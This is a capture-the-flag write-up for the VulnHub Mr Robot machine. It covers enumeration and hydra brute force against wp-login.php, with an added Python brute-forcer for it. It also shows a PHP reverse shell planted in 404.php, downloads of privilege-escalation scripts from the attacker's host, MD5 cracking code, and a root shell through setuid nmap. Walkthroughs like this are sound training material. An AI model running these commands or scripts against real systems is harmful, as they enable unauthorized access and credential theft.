@comradecheese
Created September 12, 2021 05:44
VulnHub write-up for the MrRobot machine.

Mr Robot

VulnHub

Enumeration

Start port scanning and enumerating services.

# check if the box is up
ping <target-ip>

# run initial nmap scan
sudo nmap -sS -T4 <target-ip> -oN nmap/init

# run a service scan
sudo nmap -sV -p 22,80,443 -T4 <target-ip> -oN nmap/service
...
PORT    STATE  SERVICE  REASON         VERSION
22/tcp  closed ssh      reset ttl 64
80/tcp  open   http     syn-ack ttl 64 Apache httpd
443/tcp open   ssl/http syn-ack ttl 64 Apache httpd

# run script scan
nmap -Pn -p 22,80,443 --script default,vuln <target-ip> -oN nmap/scripts
...
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /feed/: Wordpress version: 4.3.1
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder

It appears to be an Apache web server, probably running Wordpress (http-enum guesses several old versions from static files, but the /feed/ generator tag gives 4.3.1). Continue enumerating HTTP to confirm this.

# enumerate http 
gobuster dir -u http://<target-ip>/ -w /usr/share/wordlists/dirb/common.txt -x txt,html,php -o gobuster.common
...
/robots.txt           (Status: 200) [Size: 41]
/wp-login             (Status: 200) [Size: 2657]

nikto -h http://<target-ip>/ -Format=txt -o nikto
...
+ GET Cookie wordpress_test_cookie created without the httponly flag
+ GET /wp-login/: Admin login page/section found.
+ GET /wordpress: A Wordpress installation was found.
+ GET /wp-admin/wp-login.php: Wordpress login found
+ GET /wordpresswp-admin/wp-login.php: Wordpress login found
+ GET /blog/wp-login.php: Wordpress login found
+ GET /wp-login.php: Wordpress login found
+ GET /wordpresswp-login.php: Wordpress login found

wpscan --url http://<target-ip>/ -e vp 
...
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Rss Generator (Aggressive Detection)
 |  - http://<target-ip>/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
 |  - http://<target-ip>/comments/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>

There are a few interesting entries in robots.txt.

# view robots.txt
curl http://<target-ip>/robots.txt
...
User-agent: *
fsocity.dic
key-1-of-3.txt

# grab both the files
wget http://<target-ip>/key-1-of-3.txt
wget http://<target-ip>/fsocity.dic

The text file is the first flag and fsocity.dic appears to be a wordlist. Use it to enumerate the Wordpress username first: wp-login.php on this version answers "Invalid username" for an unknown user and "The password you entered for the username ... is incorrect" for a known one, so the error message is an oracle that confirms valid accounts before any password guessing is needed.

# sort and remove duplicates in wordlist
sort fsocity.dic | uniq > fsocity.dic.uniq

# enumerate wp-login user
hydra -L fsocity.dic.uniq -p blah <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
...
[80][http-post-form] host: <target-ip>   login: Elliot   password: blah

# bruteforce login
hydra -l Elliot -P fsocity.dic.uniq <target-ip> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
...
[80][http-post-form] host: <target-ip>   login: Elliot   password: ER28-0652
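
The two hydra commands above work because of that response oracle, so here is the same enumeration and password-guessing logic written out in Python. This is an added example, not code from the write-up: the form field names (log, pwd, wp-submit) are Wordpress's own, the failure strings are the ones hydra matched above, and the login URL and wordlist path are assumptions passed on the command line; demo_sender is a constructed stand-in for the target so the logic can be dry-run offline.

```python
"""Username enumeration and password guessing via the wp-login.php error oracle."""
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

Response = Tuple[int, List[str], str]      # (status, Set-Cookie values, body)
Sender = Callable[[str, str], Response]    # send(user, password) -> Response


def classify(resp: Response) -> str:
    """Map one wp-login.php response to the outcome it leaks."""
    status, cookies, body = resp
    if status == 302 and any(c.startswith("wordpress_logged_in_") for c in cookies):
        return "success"
    if "Invalid username" in body:
        return "no-such-user"
    if "is incorrect" in body:
        return "wrong-password"      # user exists, password does not
    return "unknown"                 # lockout plugin, WAF, or a different WP version


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow the 302 on success; its Set-Cookie header is the evidence."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_sender(login_url: str, timeout: float = 10.0) -> Sender:
    """Build a send(user, password) function that POSTs the login form."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(user: str, password: str) -> Response:
        form = {"log": user, "pwd": password, "wp-submit": "Log In"}
        req = urllib.request.Request(
            login_url, data=urllib.parse.urlencode(form).encode(), method="POST")
        try:
            with opener.open(req, timeout=timeout) as r:
                return r.status, r.headers.get_all("Set-Cookie") or [], r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:   # the unfollowed 302 is raised as an error
            return e.code, e.headers.get_all("Set-Cookie") or [], e.read().decode(errors="replace")

    return send


def dedup(words: Iterable[str]) -> List[str]:
    """Equivalent of `sort | uniq` on fsocity.dic, keeping first-seen order."""
    return list(dict.fromkeys(w.strip() for w in words if w.strip()))


def enumerate_users(candidates: Iterable[str], send: Sender, probe: str = "blah") -> List[str]:
    """First hydra command: any candidate not answered with 'Invalid username' exists."""
    return [u for u in dedup(candidates)
            if classify(send(u, probe)) in ("wrong-password", "success")]


def guess_password(user: str, candidates: Iterable[str], send: Sender) -> Optional[str]:
    """Second hydra command: try each candidate password for a confirmed user."""
    for pw in dedup(candidates):
        if classify(send(user, pw)) == "success":
            return pw
    return None


def demo_sender(user: str, password: str) -> Response:
    """Constructed stand-in for the target (assumption) so the logic runs offline."""
    if user != "Elliot":
        return 200, [], "<strong>ERROR</strong>: Invalid username."
    if password != "ER28-0652":
        return 200, [], ("<strong>ERROR</strong>: The password you entered for the "
                         "username <strong>Elliot</strong> is incorrect.")
    return 302, ["wordpress_logged_in_0123abcd=Elliot%7C1; path=/wp-admin"], ""


if __name__ == "__main__":
    # usage: python3 wp_oracle.py http://<target-ip>/wp-login.php fsocity.dic
    login_url, wordlist = sys.argv[1], sys.argv[2]
    with open(wordlist, errors="replace") as fh:
        words = dedup(fh)
    send = make_sender(login_url)
    for user in enumerate_users(words, send):
        print(user, guess_password(user, words, send))
```

Against a real target the 302-plus-wordpress_logged_in_ cookie check is more reliable than matching a success string, and the "unknown" outcome is worth logging rather than discarding: a lockout plugin or a WAF answers with neither message and would otherwise look like a miss.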

Enumeration Loot

key-1-of-3.txt:073403c8a58a1f80d943455fb30724b9  
Elliot:ER28-0652  

Exploitation

Log into Wordpress as Elliot, open Appearance > Editor, select the active theme's 404 Template (404.php) and replace its contents with a PHP reverse shell (for example pentestmonkey's php-reverse-shell.php) that connects back to the attacking machine on port 8001. Requesting any page that does not exist makes Wordpress render 404.php and run the payload.

# set up a listener on the attacking machine, then browse to a non-existent URL on the target
netcat -lvnp 8001

# stabilise captured shell
python3 -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm

# background the shell with Ctrl + Z, then fix the attacking terminal (runs locally, no sudo needed) and foreground it
stty raw -echo; fg

# look in /home/robot for the second flag
ls -la /home/robot
...
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

key-2-of-3.txt is readable only by robot (mode 0400), so the shell obtained through Apache cannot open it. password.raw-md5 is world-readable and, at 39 bytes, is exactly the size of `robot:` followed by a 32-character hex MD5 digest and a newline, so it appears to be a password hash. Upload linpeas and/or LinEnum to the target to look for privilege-escalation paths.

# on the attacking machine, serve LinEnum.sh and linpeas.sh from the directory that holds them
python3 -m http.server 8080

# on the target, download both scripts and make them executable
wget http://<attack-ip>:8080/LinEnum.sh
wget http://<attack-ip>:8080/linpeas.sh

chmod +x LinEnum.sh
chmod +x linpeas.sh

./LinEnum.sh

./linpeas.sh
...
[+] nmap is available for network discover & port scanning, you should use it yourself
...
-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap
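
The check behind that linpeas line, as an added example that is not from the write-up: walk the filesystem for regular files with the setuid bit (what `find / -perm -4000 -type f` does) and flag any whose name GTFOBins lists. The WATCH set is a small sample of GTFOBins SUID entries and is an assumption of this example, as are the search roots; the temporary file used to exercise it is constructed.

```python
"""Manual setuid-root binary check, with a GTFOBins-style watch list."""
import os
import stat
import sys
from typing import Iterable, List

# a few binaries GTFOBins documents as giving a shell when setuid (sample, extend as needed)
WATCH = {"nmap", "find", "vim", "bash", "python", "perl", "env", "awk"}


def is_setuid(mode: int) -> bool:
    """True for a regular file with the setuid bit set; directories and symlinks are ignored."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(roots: Iterable[str], owner_uid: int = 0) -> List[str]:
    """Return setuid files under roots owned by owner_uid (root by default)."""
    hits: List[str] = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)          # lstat: do not follow symlinks
                except OSError:
                    continue                     # unreadable or vanished, like find's stderr noise
                if is_setuid(st.st_mode) and st.st_uid == owner_uid:
                    hits.append(path)
    return hits


def flag_known(paths: Iterable[str]) -> List[str]:
    """Subset of paths whose basename is on the watch list, e.g. /usr/local/bin/nmap."""
    return [p for p in paths if os.path.basename(p) in WATCH]


if __name__ == "__main__":
    # usage on the target: python3 suid_check.py /usr /bin /sbin /opt   (defaults to /)
    found = find_suid(sys.argv[1:] or ["/"])
    flagged = set(flag_known(found))
    for p in found:
        print(("[!] " if p in flagged else "    ") + p)
```

A hit on the watch list is a lead, not a finished escalation: the binary's version and build options decide whether the GTFOBins trick applies, which is why the next step checks what this particular nmap supports.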

The hash belongs to robot, so crack it offline and use the recovered password to switch user.

# on the attacking machine, save the contents of password.raw-md5 to a file and crack it with john (raw-md5 = unsalted MD5)
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt password.raw-md5

# on the target, switch to robot with the cracked password
su robot
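
What the john command does for this file, as an added example that is not part of the write-up: raw-md5 means an unsalted MD5 digest, so each wordlist entry is hashed once and compared against every target, which is why a plain wordlist pass is enough. The hash-file text and the small wordlist used to exercise it are constructed; the file and wordlist paths are assumptions taken from the command line.

```python
"""Crack john's raw-md5 input (user:32-hex-digest lines) against a wordlist."""
import hashlib
import sys
from typing import Dict, Iterable, List, Union

HEX = set("0123456789abcdef")


def parse_raw_md5(text: str) -> Dict[str, str]:
    """Return {user: digest} for every well-formed user:md5 line; skip anything else."""
    found: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        user, digest = line.rsplit(":", 1)
        digest = digest.lower()
        if len(digest) == 32 and set(digest) <= HEX:
            found[user] = digest
    return found


def crack(hashes: Dict[str, str], wordlist: Iterable[Union[str, bytes]]) -> Dict[str, str]:
    """Hash each candidate once and match it against every uncracked target digest."""
    pending: Dict[str, List[str]] = {}            # digest -> users still uncracked
    for user, digest in hashes.items():
        pending.setdefault(digest, []).append(user)
    cracked: Dict[str, str] = {}
    for word in wordlist:
        raw = word if isinstance(word, bytes) else word.encode("utf-8")
        raw = raw.rstrip(b"\r\n")
        digest = hashlib.md5(raw).hexdigest()     # unsalted: equal passwords give equal hashes
        if digest in pending:
            for user in pending.pop(digest):
                cracked[user] = raw.decode("utf-8", errors="replace")
            if not pending:
                break                             # everything cracked, stop early
    return cracked


if __name__ == "__main__":
    # usage: python3 crack_raw_md5.py password.raw-md5 /usr/share/wordlists/rockyou.txt
    with open(sys.argv[1]) as fh:
        targets = parse_raw_md5(fh.read())
    with open(sys.argv[2], "rb") as fh:           # bytes: rockyou.txt is not valid UTF-8
        for user, password in crack(targets, fh).items():
            print(f"{user}:{password}")
```

Reading the wordlist as bytes matters in practice: rockyou.txt contains lines that are not valid UTF-8, and decoding them would either crash the loop or silently change the bytes that get hashed.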

linpeas flagged /usr/local/bin/nmap as setuid root. Older nmap builds have an --interactive mode that can run shell commands, and because the binary is setuid the shell it spawns keeps root's effective uid, as documented on GTFOBins. Confirm with id afterwards.

# escalate to root using nmap
nmap --interactive
nmap> !sh

Exploitation Loot

robot:abcdefghijklmnopqrstuvwxyz  
key-2-of-3.txt:822c73956184f694993bede3eb39f959  
key-3-of-3.txt:04787ddef27c3dee1ee161b21670b4e4  